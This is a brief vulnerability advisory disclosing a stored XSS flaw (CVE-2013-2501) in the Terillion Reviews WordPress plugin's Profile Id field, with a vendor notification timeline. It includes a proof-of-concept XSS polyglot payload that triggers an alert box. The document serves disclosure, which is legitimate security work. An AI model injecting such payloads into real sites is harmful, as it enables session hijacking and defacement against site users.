Stored XSS in Terillion Reviews Wordpress Plugin

2013-03-11T00:00:00
ID SECURITYVULNS:DOC:29180
Type securityvulns
Reporter Securityvulns
Modified 2013-03-11T00:00:00

Description

CVE Assigned-CVE-2013-2501

Exploit Title : Stored XSS in Terillion Reviews Plugin Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 08/03/13 Software link:
http://wordpress.org/extend/plugins/terillion-reviews/

The Terillion Reviews Plugin in Wordpress http://wordpress.org/extend/plugins/terillion-reviews/ has a Stored XSS Vulnerability in the Profile Id input box.

PoC Script Used

Script Used-

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- > </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Vendor Notification

20/02/2013 - Vendor notified awaiting action 07/03/2013 - Removed from the Wordpress Repository